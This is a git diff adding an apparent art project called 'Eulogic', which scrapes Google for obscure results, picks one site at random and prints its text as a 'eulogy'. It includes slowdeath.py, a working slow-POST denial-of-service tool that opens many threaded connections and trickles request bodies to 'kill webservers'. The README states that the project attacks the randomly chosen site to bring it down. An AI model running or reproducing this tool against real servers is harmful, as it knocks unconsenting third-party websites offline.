diff --git a/README b/README new file mode 100644 index 0000000..d01d767 --- /dev/null +++ b/README @@ -0,0 +1,4 @@ +Eulogic scrapes Google, returns the least relevant results, takes one at random, scrapes the text, then attacks to bring down, and delivers the site's content as eulogy. + +Alexandar Kozovski +Johann Diedrick \ No newline at end of file diff --git a/search.py b/search.py new file mode 100644 index 0000000..1fa2700 --- /dev/null +++ b/search.py @@ -0,0 +1,111 @@ +import urllib2 +import simplejson +import re +import requests +from bs4 import BeautifulSoup +from random import choice +# Take a variable, search google, find the lowest results, return one random, scrape and return + + #function to use if we want to control size of string + # from bs4 import SoupStrainer + # only_a_tags = SoupStrainer("a") + # + # only_tags_with_id_link2 = SoupStrainer(id="link2") + # + # def is_short_string(string): + # return len(string) < 10 + # + # only_short_strings = SoupStrainer(text=is_short_string) + + + # The request also includes the userip parameter which provides the end + # user's IP address. Doing so will help distinguish this legitimate + # server-side traffic from traffic which doesn't come from an end-user. + + + +id = "hotdog" # dynamic id from site in a post request +url = ('https://ajax.googleapis.com/ajax/services/search/web' + '?v=1.0&q='+ id + '&userip=USERS-IP-ADDRESS') + +request = urllib2.Request(url, None, {'Referer': "www.google.com" }) +response = urllib2.urlopen(request) # opening url + + # Process the JSON string. +results = simplejson.load(response) +results = results["responseData"] +results = results['cursor'] +nofResults = (results["resultCount"]) + # set a variable for search result pagination +nom = long(nofResults.replace(",", ""))/10000 +# if nom >= 100000: +# nom = nom/10000 +# elif nom < 100000: +# nom = nom/10000 + +print "Results searched...." ,nom +results = results["moreResultsUrl"] +#print results + + #results = results['resultCount'] + + #regex to add number to results +split = re.split("start=0", results) +newurl= split[0] + "start=" + str(nom) +split[1] +print "found!!!"+ newurl + +r = requests.get(newurl) + # print r.status_code + # print r.headers['content-type'] + +r= r.text +soup = BeautifulSoup(r) +all = [] +for link in soup.find_all("a"): + all.append(link.get("href")) +listOfUrls= [] + +for s in all: #iterate through the document and extract links + if re.findall("/url?", s): + + split1 = re.split("&", s) + split2 =re.split("=", split1[0]) + deathlinks=[] + sp =(split2[1]).split("//n") + #print sp[0] + + # list of lists + listOfUrls.append(sp[0]) + + +def myloop(listOfUrls): + deathUrl = choice(listOfUrls) + listOfUrls.remove(deathUrl) + if len(listOfUrls) > 0: + #printing the selected url + print "Dying! " + deathUrl + # for url in deathUrl: #open urls and parse + death= urllib2.urlopen(deathUrl) + try: + death = death.read() + deathSoup = BeautifulSoup(death) + #print (deathSoup.get_text()) + for string in deathSoup.stripped_strings: + tocontextfree = repr(string) + print tocontextfree + + + + except (Exception,NameError,urllib2.HTTPError,urllib2.URLError): + # deathUrl = choice(listOfUrls) + print "I love errors" + print deathUrl + return myloop(listOfUrls) + +print 'end' + +myloop(listOfUrls) + +# print (deathSoup.get_text()) + # a different HTML parse function using stripped string to remove white space + diff --git a/slowdeath.py b/slowdeath.py new file mode 100755 index 0000000..696c02d --- /dev/null +++ b/slowdeath.py @@ -0,0 +1,97 @@ +#!/usr/bin/env python + +from optparse import OptionParser +from urlparse import urlparse +from time import sleep +import socket +import threading + +def openConnections(url, threads, sleepTime) : + urlParts = urlparse(url) + if (urlParts.scheme != 'http'): + raise Exception('Only the http protocol is currently supported') + + port = urlParts.port + + if port == None: port = 80 + + print "Opening %d sockets to %s:%d" % (threads, urlParts.hostname, port) + + pool = [] + + try: + for i in range(1, threads): + t = Worker(urlParts.hostname, port, urlParts.path, sleepTime) + pool.append(t) + t.start() + + print "Started %d threads. Hit ctrl-c to exit" % (threads) + + while True: sleep(1) + + except KeyboardInterrupt, e: + print "\nCaught keyboard interrupt. Stopping all threads" + + for worker in pool: worker.stop() + + for worker in pool: worker.join() + +class Worker (threading.Thread): + def __init__(self, host, port, path, sleepTime) : + self.host = host + self.port = port + self.path = path + self.sleepTime = sleepTime + self.stopped = False + threading.Thread.__init__(self) + + def stop(self): self.stopped = True + + def run(self): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.host, self.port)) + s.settimeout(1) + s.send( + 'POST ' + self.path + ' HTTP/1.1\r\n' + + 'Host: ' + self.host + '\r\n' + + 'Connection: close\r\n' + + 'Content-Length: 1000000\r\n' + + '\r\n' + ) + + while not self.stopped: + s.send('abc=123&') + sleep(self.sleepTime/1000) + + s.close + +def main(): + parser = OptionParser( + version="slowdeath v0.1", + description="Kills webservers by keeping many connections open, avoiding timeouts.", + usage="usage: %prog [options] url", + ) + parser.add_option( + '-t','--threads', + help="Number of connections to keep open (default = 100)", + type="int", + dest="threads", + default=100 + ) + parser.add_option( + '-s','--sleep', + help="Time in between packages in millisenconds (default = 1000)", + type="int", + dest="sleepTime", + default=1000 + ) + + options,args = parser.parse_args() + + if len(args) < 1: parser.error("This utility requires at least 1 argument") + + url = args[0] + + openConnections(url, options.threads, options.sleepTime) + +if __name__ == '__main__': main() \ No newline at end of file